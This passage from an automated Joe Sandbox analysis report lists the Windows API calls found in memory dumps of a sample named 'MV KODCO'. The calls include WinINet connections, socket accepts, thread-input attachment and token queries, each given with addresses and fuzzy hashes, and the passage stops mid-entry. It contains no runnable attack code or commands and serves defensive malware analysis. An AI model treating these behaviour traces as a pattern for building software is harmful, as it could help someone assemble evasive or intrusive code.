                                                          • Opcode Fuzzy Hash: 63252059b1cb409f77e4afdb61ed1098313c3f061a53e9f8426610a14e0b0b3b
                                                          • Instruction Fuzzy Hash: A0217E39600028EFDB159F94C858EEF7BB6EB4A710F084069F9058B2A1D7759A51DB60
                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00634358
                                                            • Part of subcall function 006343E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00634401
                                                            • Part of subcall function 006343E2: InternetCloseHandle.WININET(00000000), ref: 0063449E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Internet$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 1463438336-0
                                                          • Opcode ID: f1e45eeb4cf93316c3454cf29a059fa504495e879b820be2cb514dbfd67f6a85
                                                          • Instruction ID: 625e3d7c505df6f492e213f07c2faa3a0367344d9dddb0069c9dbd4405d84fd6
                                                          • Opcode Fuzzy Hash: f1e45eeb4cf93316c3454cf29a059fa504495e879b820be2cb514dbfd67f6a85
                                                          • Instruction Fuzzy Hash: C5219F31604605BBEB159F619C00FBBFBABFF48710F10501AFA1597650DBB1A821ABD1
                                                          APIs
                                                          • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00638AE0
                                                          • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00638AF2
                                                          • accept.WSOCK32(00000000,00000000,00000000), ref: 00638AFF
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00638B16
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: ErrorLastacceptselect
                                                          • String ID:
                                                          • API String ID: 385091864-0
                                                          • Opcode ID: 619e2fdd837ef4f31d8222c86a48a02b9c76f7973d11cb735f6f6386bd6082e5
                                                          • Instruction ID: e5986aeb1633cff8d5da43f08b57f3a80f238f14ecec6c15b0a5c6c58313e3db
                                                          • Opcode Fuzzy Hash: 619e2fdd837ef4f31d8222c86a48a02b9c76f7973d11cb735f6f6386bd6082e5
                                                          • Instruction Fuzzy Hash: 25218471A001249FC7119F69D985ADEBFEDEF49310F004169F949D7290DB749D418F90
                                                          APIs
                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00648AA6
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00648AC0
                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00648ACE
                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00648ADC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Window$Long$AttributesLayered
                                                          • String ID:
                                                          • API String ID: 2169480361-0
                                                          • Opcode ID: 59f4462a557db872f187ab3745c8b591ddcb0c16594f09bd83431e73bde8a4fa
                                                          • Instruction ID: d571bae3832965fc78f87bfc4408de06e77d61e7c1545b650cb239e006b92d9e
                                                          • Opcode Fuzzy Hash: 59f4462a557db872f187ab3745c8b591ddcb0c16594f09bd83431e73bde8a4fa
                                                          • Instruction Fuzzy Hash: 6F119A31345511AFE708AB28DC09FBE7BAABF85320F144119F916C72E2CBB0AC418B94
                                                          APIs
                                                            • Part of subcall function 00621E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00620ABB,?,?,?,0062187A,00000000,000000EF,00000119,?,?), ref: 00621E77
                                                            • Part of subcall function 00621E68: lstrcpyW.KERNEL32(00000000,?,?,00620ABB,?,?,?,0062187A,00000000,000000EF,00000119,?,?,00000000), ref: 00621E9D
                                                            • Part of subcall function 00621E68: lstrcmpiW.KERNEL32(00000000,?,00620ABB,?,?,?,0062187A,00000000,000000EF,00000119,?,?), ref: 00621ECE
                                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0062187A,00000000,000000EF,00000119,?,?,00000000), ref: 00620AD4
                                                          • lstrcpyW.KERNEL32(00000000,?,?,0062187A,00000000,000000EF,00000119,?,?,00000000), ref: 00620AFA
                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0062187A,00000000,000000EF,00000119,?,?,00000000), ref: 00620B2E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: lstrcmpilstrcpylstrlen
                                                          • String ID: cdecl
                                                          • API String ID: 4031866154-3896280584
                                                          • Opcode ID: 9ab4f4e70a93e057d680fb890ed71e6c27f47243ca26fe2e09ec98c253bad118
                                                          • Instruction ID: 9671e23d2e1097808aaef76da83603c85894cb59a413a6f8b12f72840884bfc7
                                                          • Opcode Fuzzy Hash: 9ab4f4e70a93e057d680fb890ed71e6c27f47243ca26fe2e09ec98c253bad118
                                                          • Instruction Fuzzy Hash: 3D11B93A200315AFDB259F34EC45DBA77AAFF49354B80406AF905CB251EB719851CBE0
                                                          APIs
                                                          • _free.LIBCMT ref: 00612FB5
                                                            • Part of subcall function 0060395C: __FF_MSGBANNER.LIBCMT ref: 00603973
                                                            • Part of subcall function 0060395C: __NMSG_WRITE.LIBCMT ref: 0060397A
                                                            • Part of subcall function 0060395C: RtlAllocateHeap.NTDLL(00E10000,00000000,00000001,00000001,00000000,?,?,005FF507,?,0000000E), ref: 0060399F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: AllocateHeap_free
                                                          • String ID:
                                                          • API String ID: 614378929-0
                                                          • Opcode ID: 43765cdb387c4770e4503cff0115d87eabf23b4c8bd1c4dc6acef71b238abac2
                                                          • Instruction ID: 2490e148ad133a2da7a9d768b8ef5ec24c5d25ae97897b73b92c45227734fb2c
                                                          • Opcode Fuzzy Hash: 43765cdb387c4770e4503cff0115d87eabf23b4c8bd1c4dc6acef71b238abac2
                                                          • Instruction Fuzzy Hash: 1411EB319882229FDB253F70AC146DB3BD7AF05361F28481DF849DA391DB30DD918694
                                                          APIs
                                                          • _memset.LIBCMT ref: 005FEBB2
                                                            • Part of subcall function 005E51AF: _memset.LIBCMT ref: 005E522F
                                                            • Part of subcall function 005E51AF: _wcscpy.LIBCMT ref: 005E5283
                                                            • Part of subcall function 005E51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 005E5293
                                                          • KillTimer.USER32(?,00000001,?,?), ref: 005FEC07
                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 005FEC16
                                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00653C88
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                          • String ID:
                                                          • API String ID: 1378193009-0
                                                          • Opcode ID: 9209298c836c15ec354cdff6db16a88bb1d0082ba5fa521a587572fe077610cd
                                                          • Instruction ID: 613b75126fd1a97d7c856336f919b6ab68060e742d55983a2edd5fdcc872ddcd
                                                          • Opcode Fuzzy Hash: 9209298c836c15ec354cdff6db16a88bb1d0082ba5fa521a587572fe077610cd
                                                          • Instruction Fuzzy Hash: 4021C5709047949FE7329B288859BE7BFEDAB05709F04048DE78A97281C7B42A888B51
                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006205AC
                                                          • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006205C7
                                                          • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006205DD
                                                          • FreeLibrary.KERNEL32(?), ref: 00620632
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                          • String ID:
                                                          • API String ID: 3137044355-0
                                                          • Opcode ID: f8ded7833365da56a868b8a00a63d893da172bdb571e11d6337342058bce7a0d
                                                          • Instruction ID: 0637b8a43519227fd408ce9da8130103aa3cc09380a37616286d79193466065c
                                                          • Opcode Fuzzy Hash: f8ded7833365da56a868b8a00a63d893da172bdb571e11d6337342058bce7a0d
                                                          • Instruction Fuzzy Hash: 41219371A00629FFEB20CF91FC98ADABBBAEF40700F00846DE51696151D7B1EA55DF50
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00626733
                                                          • _memset.LIBCMT ref: 00626754
                                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 006267A6
                                                          • CloseHandle.KERNEL32(00000000), ref: 006267AF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle_memset
                                                          • String ID:
                                                          • API String ID: 1157408455-0
                                                          • Opcode ID: d573dca336a8ef12a335f1f484a9f0f13e0f976ebdbd886b6efe276ca2b52791
                                                          • Instruction ID: 2ff73e70346dd894709158a5ca6a62fdd8fa4a4109054187b599bb0f51d4c635
                                                          • Opcode Fuzzy Hash: d573dca336a8ef12a335f1f484a9f0f13e0f976ebdbd886b6efe276ca2b52791
                                                          • Instruction Fuzzy Hash: 9E11A775D012287AE72057A5AC4DFEBBABDEF45764F10419AF504E71D0D2B44E808BB4
                                                          APIs
                                                            • Part of subcall function 0061AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0061AA79
                                                            • Part of subcall function 0061AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0061AA83
                                                            • Part of subcall function 0061AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0061AA92
                                                            • Part of subcall function 0061AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0061AA99
                                                            • Part of subcall function 0061AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0061AAAF
                                                          • GetLengthSid.ADVAPI32(?,00000000,0061ADE4,?,?), ref: 0061B21B
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0061B227
                                                          • HeapAlloc.KERNEL32(00000000), ref: 0061B22E
                                                          • CopySid.ADVAPI32(?,00000000,?), ref: 0061B247
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                          • String ID:
                                                          • API String ID: 4217664535-0
                                                          • Opcode ID: f029dbab21fe565091e604288716311bed18de2fdf2732dda561856bdff9c8de
                                                          • Instruction ID: 284161f49b107de3e111f6be988184c9b6bcec79d05a4d3501d8e9dc27f87030
                                                          • Opcode Fuzzy Hash: f029dbab21fe565091e604288716311bed18de2fdf2732dda561856bdff9c8de
                                                          • Instruction Fuzzy Hash: 72118C71A00205AFDB049F98DD95AFEB7BAEF85304F18A02DE94297210D771AE88CB10
                                                          APIs
                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0061B498
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0061B4AA
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0061B4C0
                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0061B4DB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: MessageSend
                                                          • String ID:
                                                          • API String ID: 3850602802-0
                                                          • Opcode ID: 2d5ba45c17ce6f78ddf8e82ca97fdb81f767d4d1c9755ab28050c98e9b2e368f
                                                          • Instruction ID: f9eb6e16563ea351254f936463436c366836da0fab169c134a493eccc9b7910e
                                                          • Opcode Fuzzy Hash: 2d5ba45c17ce6f78ddf8e82ca97fdb81f767d4d1c9755ab28050c98e9b2e368f
                                                          • Instruction Fuzzy Hash: BB115A7A900218FFDB11DFA9C881EDDBBB5FB08700F208095E604B7294D771AE51DB94
                                                          APIs
                                                            • Part of subcall function 005FB34E: GetWindowLongW.USER32(?,000000EB), ref: 005FB35F
                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 005FB5A5
                                                          • GetClientRect.USER32(?,?), ref: 0065E69A
                                                          • GetCursorPos.USER32(?), ref: 0065E6A4
                                                          • ScreenToClient.USER32(?,?), ref: 0065E6AF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                          • String ID:
                                                          • API String ID: 4127811313-0
                                                          • Opcode ID: 08484f91ef3d976a3a8f196b64df6eb503b2873b92ab0338ccd2b29830feac37
                                                          • Instruction ID: a70628307b09eaa348ea827a56ea0e9b5df89c86cae5a26990c9d6a7839df222
                                                          • Opcode Fuzzy Hash: 08484f91ef3d976a3a8f196b64df6eb503b2873b92ab0338ccd2b29830feac37
                                                          • Instruction Fuzzy Hash: 22113A31A0002AFBDF14DF54CC498FE7BBAFB49305F000455EA42E7140D778AA95CBA1
                                                          APIs
                                                          • GetCurrentThreadId.KERNEL32 ref: 00627352
                                                          • MessageBoxW.USER32(?,?,?,?), ref: 00627385
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0062739B
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 006273A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                          • String ID:
                                                          • API String ID: 2880819207-0
                                                          • Opcode ID: 050a973b3547109059eee6b97b043ad4d30d3baaf83e1e6c66fe171a4e8cd555
                                                          • Instruction ID: 85ecd080382ddda7bd41fba0f25bf7d749267328ebdbbc6c8e713d533016bdd0
                                                          • Opcode Fuzzy Hash: 050a973b3547109059eee6b97b043ad4d30d3baaf83e1e6c66fe171a4e8cd555
                                                          • Instruction Fuzzy Hash: 3711E172A04624ABC701DBA8EC09EDE7BAF9F4A350F044255F921D33A1D6B09A109BA1
                                                          APIs
                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 005FD1BA
                                                          • GetStockObject.GDI32(00000011), ref: 005FD1CE
                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 005FD1D8
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: CreateMessageObjectSendStockWindow
                                                          • String ID:
                                                          • API String ID: 3970641297-0
                                                          • Opcode ID: 38d5efb9536aa183e7b12dbeb5ce935464deadece59d6084faf5bd56739209ad
                                                          • Instruction ID: 5a6c6e7de62b5c686868a98dcb61ebeeaa21c3cffe5a950147b24613ecf38ba2
                                                          • Opcode Fuzzy Hash: 38d5efb9536aa183e7b12dbeb5ce935464deadece59d6084faf5bd56739209ad
                                                          • Instruction Fuzzy Hash: EE118BB260150DBFEB125F909C50EEABF6BFF193A4F041216FA0492050C776AD60EBA0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                          • String ID:
                                                          • API String ID: 3016257755-0
                                                          • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                          • Instruction ID: 980c0dd78fc6cd03f6d707597de9d06db5d8c66a64d36724fb5da759081868d0
                                                          • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                          • Instruction Fuzzy Hash: EE014C3600014EFBCF525E94DC02CEE3F63BB18391B588555FE295A131DB36CAB2AB85
                                                          APIs
                                                            • Part of subcall function 005FAF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005FAFE3
                                                            • Part of subcall function 005FAF83: SelectObject.GDI32(?,00000000), ref: 005FAFF2
                                                            • Part of subcall function 005FAF83: BeginPath.GDI32(?), ref: 005FB009
                                                            • Part of subcall function 005FAF83: SelectObject.GDI32(?,00000000), ref: 005FB033
                                                          • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0064EA8E
                                                          • LineTo.GDI32(00000000,?,?), ref: 0064EA9B
                                                          • EndPath.GDI32(00000000), ref: 0064EAAB
                                                          • StrokePath.GDI32(00000000), ref: 0064EAB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                          • String ID:
                                                          • API String ID: 1539411459-0
                                                          • Opcode ID: e7c28d5ca349c629cf875c371e19793469ccba0c74b37c953126cdd41a9cfccf
                                                          • Instruction ID: 39fb94cbbc089ff41978f9b3635b3ee496692383deb7339104ab27f14a6238b0
                                                          • Opcode Fuzzy Hash: e7c28d5ca349c629cf875c371e19793469ccba0c74b37c953126cdd41a9cfccf
                                                          • Instruction Fuzzy Hash: 28F08231505259BBDB12AF94AD0DFCE3F1BAF0B311F085101FF11651E187B55651CB9A
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0061C84A
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0061C85D
                                                          • GetCurrentThreadId.KERNEL32 ref: 0061C864
                                                          • AttachThreadInput.USER32(00000000), ref: 0061C86B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1710127696.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.1710112810.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000066D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710165903.000000000068E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710236501.000000000069A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1710252620.00000000006A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_5e0000_MV KODCO.jbxd
                                                          Similarity
                                                          • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 2710830443-0
                                                          • Opcode ID: 9c3730f15e2043ac5a164a8bbfb863bbbe36e5d6bac4d2085043e76613928ca7
                                                          • Instruction ID: 6fef51b39eda2bbcbcafaf98ab6b385d7bf71672813950ab0b3451bf3c927d39
